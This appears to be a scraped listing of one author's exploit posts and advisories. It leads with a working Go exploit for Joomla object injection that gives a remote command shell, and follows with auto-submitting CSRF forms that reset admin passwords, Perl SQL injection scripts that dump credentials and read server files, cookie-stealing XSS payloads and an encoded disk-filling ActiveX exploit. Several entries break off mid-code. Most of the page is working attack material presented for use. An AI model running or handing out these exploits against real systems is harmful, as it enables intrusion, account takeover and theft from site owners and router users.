Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)
package main /* ** * Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit * Exploit Author: Khashayar Fereidani ( http://fereidani.com ) * Version: 1.5.x to 3.4.5 * CVE : CVE-2015-8562 ** * THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE * IS ON YOUR OWN RESPONSIBILITY ** * How to run : (you need golang compiler from golang.org) * go run exploit.go http://target/path * or * go build exploit.go * ./exploit http://target/path ** * DEMO : $ ./exploit 192.168.1.113/joomla ### # Joomla Remote Command Execution 0day Exploit # Exploited by: Khashayar Fereidani # http://fereidani.com # Vulnerable Versions: 1.5.x to 3.4.5 ### Attacking to http://FILTERED.TLD/joomla/ Target is vulnerable ! # Command Line Documentation : read FILEPATH read file from FILEPATH dir DIRPATH list directory in DIRPATH exec COMMANDexecute system command eval phpcodeevaluate PHP Code helpdisplay this help exitclose exploit console [*] Examples: read /etc/passwd dir /etc/ exec ls -lah eval include('/etc/passwd') root@joomla:$ exec uname -a Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux root@joomla:$ */ import ( "fmt" "net/http" "regexp" "os" "io/ioutil" "bytes" "net/http/cookiejar" "net/url" "bufio" "strings" ) var target string; var helpString=`# Command Line Documentation : read FILEPATH read file from FILEPATH dir DIRPATH list directory in DIRPATH exec COMMANDexecute system command eval phpcodeevaluate PHP Code helpdisplay this help exitclose exploit console [*] Examples: read /etc/passwd dir /etc/ exec ls -lah eval include('/etc/passwd') ` var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://") var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)") var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)") var newLine=regexp.MustCompile("[\\n\\r]") var client *http.Client func newRequest(command string) *http.Request{ values:=url.Values{} values.Set("1","echo('iMH3r3=');"+command+";") req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode())) if err!=nil{ panic(err) } req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd") req.Header.Add("Content-Type", "application/x-www-form-urlencoded") return req } func escape(str string) string{ return strings.Replace(str,"'","\\'",-1) } func runCommand(command string){ res,err:=client.Do(newRequest(command)) if err!=nil{ fmt.Println(err.Error()) }else{ defer res.Body.Close() resBytes,err:=ioutil.ReadAll(res.Body) str:=string(resBytes) if err!=nil{ fmt.Println(err) } match:=resultRegex.FindStringSubmatch(str) if len(match)>0{ fmt.Print(match[0][7:]) } } } func confirm() bool{ res,err:=client.Do(newRequest("")) if err!=nil{ fmt.Println(err) return false }else{ if res.StatusCode==500{ fmt.Println("Patched PHP Version :( !") return false } defer res.Body.Close() resBytes,err:=ioutil.ReadAll(res.Body) str:=string(resBytes) if err!=nil{ fmt.Println(err) } match:=resultRegex.FindStringSubmatch(str) if len(match)>0{ return true }else{ return false } } } func main(){ fmt.Print(`### # Joomla Remote Command Execution 0day Exploit #
RecordPress Multiple Vulnerabilities
WebApplication : RecordPress 0.3.1 Type of vunlnerability : CSRF ( Change Admin Password ) And XSS Risk of use : Medium Producer Website : http://www.recordpress.org/ Discovered by : Khashayar Fereidanis Team Website : http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com Facebook : http://facebook.com/fereidani CSRF For Change Admin Password : html head/head body onLoad=javascript:document.form.submit() form action=http://examplesite/admin/rp-settings-users-edit-db.php?id=1;; method=POST name=form input type=hidden name=formusername value=admin input type=hidden name=formname value=admin input type=hidden name=formemail value=em...@pwnedpwnedpwned.sss input type=hidden name=formpass value=password input type=hidden name=formpass2 value=password input type=hidden name=formadminstatus value=2 input type=hidden name=rp-settings-users-edit-db value=Confirm+%BB /form /body /html Cross Site Scripting Vulnerabilities : http://examplesite/header.php?row[titledesc]=scriptalert(123)/script http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=scriptalert(123)/script
Linksys Cisco Wag120N CSRF Vulnerability
Hardware : Linksys Cisco Wag120n(And perhaps similar versions) Type of vunlnerability : CSRF ( Change Admin Password And Add User ) Risk of use : High Producer Website : http://linksysbycisco.com Discovered by : Khashayar Fereidani Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com CSRF For Change Admin Password : #Use sysPasswd and sysConfirmPasswd to set new password html head/head body onLoad=javascript:document.form.submit() form action=http://192.168.1.1/setup.cgi;; method=POST name=form input type=hidden name=user_list value=1 input type=hidden name=h_user_list value=1 input type=hidden name=sysname value=admin input type=hidden name=sysPasswd value=password input type=hidden name=sysConfirmPasswd value=password input type=hidden name=remote_management value=enable input type=hidden name=http_wanport value=8080 input type=hidden name=upnp_enable value=enable input type=hidden name=wlan_enable value=enable input type=hidden name=igmp_proxy_enable value=enable input type=hidden name=save value=Save+Settings input type=hidden name=h_pwset value=yes input type=hidden name=sysname_changed value=yes input type=hidden name=pwchanged value=yes input type=hidden name=pass_is_default value=false input type=hidden name=h_remote_management value=enable input type=hidden name=pass_is_none value=no input type=hidden name=h_upnp_enable value=enable input type=hidden name=h_wlan_enable value=enable input type=hidden name=h_igmp_proxy_enable value=enable input type=hidden name=todo value=save input type=hidden name=this_file value=Administration.htm input type=hidden name=next_file value=Administration.htm input type=hidden name=message value= input type=hidden name=h_wps_cur_status value= /form /body /html CSRF For Add Administrator User: #Use sysPasswd and sysConfirmPasswd to set new password #if you add new user you should set pass_is_none=yes html head/head body onLoad=javascript:document.form.submit() form action=http://192.168.1.1/setup.cgi;; method=POST name=form input type=hidden name=user_list value=2 input type=hidden name=h_user_list value=2 input type=hidden name=sysname value=ircrash input type=hidden name=sysPasswd value=password input type=hidden name=sysConfirmPasswd value=password input type=hidden name=remote_management value=enable input type=hidden name=http_wanport value=8080 input type=hidden name=upnp_enable value=enable input type=hidden name=wlan_enable value=enable input type=hidden name=igmp_proxy_enable value=enable input type=hidden name=save value=Save+Settings input type=hidden name=h_pwset value=yes input type=hidden name=sysname_changed value=yes input type=hidden name=pwchanged value=yes input type=hidden name=pass_is_default value=false input type=hidden name=h_remote_management value=enable input type=hidden name=pass_is_none value=yes input type=hidden name=h_upnp_enable value=enable input type=hidden name=h_wlan_enable value=enable input type=hidden name=h_igmp_proxy_enable value=enable input type=hidden name=todo value=save input type=hidden name=this_file value=Administration.htm input type=hidden name=next_file value=Administration.htm input type=hidden name=message value= input type=hidden name=h_wps_cur_status value= /form /body /html
SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani
|| Script : SMF (Simple Machine Forum) 1.1.11 || Vulnerability Type : Active XSS ( Active Cross Site Scripting ) || Risk : Low || Discovered By Khashayar Fereidani || http://ircrash.com http://bugtraq.ircrash.com || Note : For use this vulnerability you need access to censor words panel . 1.First login and go to : http://site/path/index.php?action=postsettings;sa=censor click on Click here to add another word. for add new row . set new text box : ircrash = scriptalert('Vulnerable')/script and save page . 2.Open new typic and set title : ircrash , fill all fields and post typic . 3.Open forum home page . you see alert : Vulerable You can set any html or java script code . hackers can home deface forum or set activex for virus . || Solution : filter censor page variables with htmlspecialchars . || Tnx : Only For God
COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)
#!/usr/bin/perl ### # COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) # # Discovered and Exploited by : Khashayar Fereidani # Http://IRCRASH.com Http://Fereidani.ir # ### # Help : # perl comraider.pl # Please enter the foldername (C:\ircrash\ for example) : C:\ircrash\ # Please enter number of copy cmd to folder (1 or more for example) : 1 # ** Ok comraider.html created , now you can use this ### # Tnx : Only for God ### $cmd = 'C:\WINDOWS\system32\cmd.exe'; print 'Please enter the foldername (C:\ircrash\ for example) : '; $folder = stdin; print Please enter number of copy cmd to folder (1 or more for example) : ; $number = stdin; chomp $number; chomp $folder; $shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).chr(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).chr(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).chr(0x76).chr(0x65).chr(0x72).chr(0x65).chr (0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x61).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).chr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x63).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A). chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).chr(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$fold er.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20
PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability
Script : PHP-Fusion Mod vArcade 1.8 Type : Sql Injection Vulnerability Risk : High Download From : http://venue.nu/ Discovered by : Khashayar Fereidani My Official Website : HTTP://FEREIDANI.IR Our Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Sql Injection Vulnerability : Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/* Google Dark : inurl:/infusions/varcade/ Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Re: Re: Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani
Hi , Attacker can bypass disable_functions mod_security safe_mode ... with this vulnerability . I think this is good reason ! http://fereidani.ir - Khashayar Fereidani
Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani
Script : Cpanel 11.x Type : Local File Inclusion Cross Site Scripting Risk : High Discovered by : Khashayar Fereidani I am 17 Years Old My Official Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Local File Inclusion Vulnerability : Note : Rename your shell to config.php and upload with your ftp account in ./ directory , now login in cpanel and enter vulnerable address in url https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ Cross site scripting : File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4 Set Action as Upgrade%20to%201.7.4 Vulnerable Variables : $localapp $updatedir $scriptpath_show $domain_show $thispage $thisapp $currentversion For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
#!/usr/bin/perl # # #Script : Ezphotogallery 2.1 # #Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure) # #Method : GET # #Alert : High # #Google Dork : 100% | 50% | 25% Back to gallery inurl:show.php?imageid= # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR # # # #Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip # # #Xss Vulnerabilities : # #Xss 1 : gallery.php?galleryid=scriptalert(document.cookie)/script #Xss 2 : show.php?imageid=156size=''?''scriptalert(document.cookie)/script #Xss 3 : show.php?imageid=scriptalert(document.cookie)/script # # #Login Bypass : # #Insert in gallery.php # #User : admin ' or ' 1=1 #Password : Dr.Crash # # #Sql Injection : # #Injection 1 : show.php?imageid=sql # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; $scriptname=Ezphotogallery 2.1; sub header { print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { #concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) $vul = /show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = /show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options :* * Mod 1
PhsBlog v0.2 Bypass Sql injection Filtering Exploit
#!/usr/bin/perl # # #Script : PhsBlog v0.2 # #Type : Bypass Sql injection Filtering Exploit # #Method : GET # #Risk : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR # # # #Script Download : http://www.phsdev.com/downloads/phsblog_current.zip # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; $scriptname=PhsBlog v0.2; sub header { print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { #concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) $vul = /index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; #index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/* $vul = ?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options :* * Mod 1 : Find Script username and password* * Mod 2 : File Disclosure(not work in many servers)* ; print \n \n Enter Mod : ; $mod=stdin; if ($mod==1 or $mod==2) { print \n Exploiting .. \n; } else { print \n Unknown Mod ! \n Exploit Failed !; }; if ($mod==1) { xpl1(); }; if ($mod==2) { xpl2(); };
Nooms 1.1
Script : Nooms 1.1 Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access) Risk : Medium Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Mysql Remote Brute Force Vulnerability : This is new type of the vulnerabilities . I can't public Exploit of this vulnerability , But with this vulnerability attacker can brute force root and other user password with php in remote mode . Mysql Brute Force Vulnerability : /db.php?g_dbhost=localhostg_dbuser=[username]g_dbpwd=[password] Cross Site Scripting Vulnerabilities : Xss 1 : http://Example/smileys.php?page_id=scriptalert('xss')/script Xss 2 : http://Example/search.php?q=;scriptalert('xss')/script Redirect Vulnerability : Xss 1 : http://Example/admin/auth.php?g_site_url=[URL] Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani
Script : Mambo 4.6.2 Full Older Versions Type : Multiple Cross Site Scripting Vulnerabilities Alert Level : Medium Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip Discovered by : Khashayar Fereidani My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerability 1 : Vulnerable File : administrator/popups/index3pop.php Vulnerable Line (5) : title?php echo $mosConfig_sitename; ? - Administration [Mambo]/title Vulnerable Variable : mosConfig_sitename For Example : http://Example/administrator/popups/index3pop.php?mosConfig_sitename=/titlescriptalert(document.cookie)/script Attacker can hijack administrator cookie and session and login with they Cross Site Scripting Vulnerability 2 : Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php? Vulnable Variable : Any Variable - You can set any variable For Example set (hacker) variable : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=scriptalert('xss')/script you can set cross site scripting code in variable name : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?scriptalert('xss')/script=Hello+Word Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
FlexCMS = 2.5 Cross Site Scripting Vulnerability
Script : FlexCMS = 2.5 Type : Cross Site Scripting Vulnerability Alert : Low Download From : http://www.flexcms.com/ Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerability : File Name : inc-core-admin-editor-previouscolorsjs.php Vulnerable Variable : PreviousColorsString Send Method : GET Register_globals : On Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');'; Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=scriptalert(document.cookie)/script Attacker can hijack admin cookie with this vulnerability Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ... Tnx : God HTTP://IRCRASH.COM
Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities
Script : Pluck 4.5.2 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium Download From : http://www.pluck-cms.org/downloads/pluck-4_5_2.tar.gz Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Our Team Website : HTTP://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerabilities : All vulnerabilities work when register_globals set as on , XSS Vulnerability 1 : /data/inc/footer.php = http://Example.com/data/inc/footer.php?lang_footer=[Cross Site Scripting] XSS Vulnerability 2 : /data/inc/header.php = http://Example.com/data/inc/header.php?pluck_version=[Cross Site Scripting] XSS Vulnerability 3 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_install22=[Cross Site Scripting] XSS Vulnerability 4 : /data/inc/header.php = http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting] XSS Vulnerability 5 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop1=[Cross Site Scripting] XSS Vulnerability 6 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop2=[Cross Site Scripting] XSS Vulnerability 7 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_modules=[Cross Site Scripting] XSS Vulnerability 8 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop4=[Cross Site Scripting] XSS Vulnerability 9 : /data/inc/header.php = http://Example.com/pluck/data/inc/header.php?lang_kop15=[Cross Site Scripting] XSS Vulnerability 10 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop5=[Cross Site Scripting] XSS Vulnerability 11 : /data/inc/header.php = http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting] XSS Vulnerability 12 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?pluck_version=[Cross Site Scripting] XSS Vulnerability 13 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting] XSS Vulnerability 14 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting] XSS Vulnerability 15 : /data/inc/themeinstall.php = http://Example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting] Solution : Filter all insecure variable with htmlspecialchars() function Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
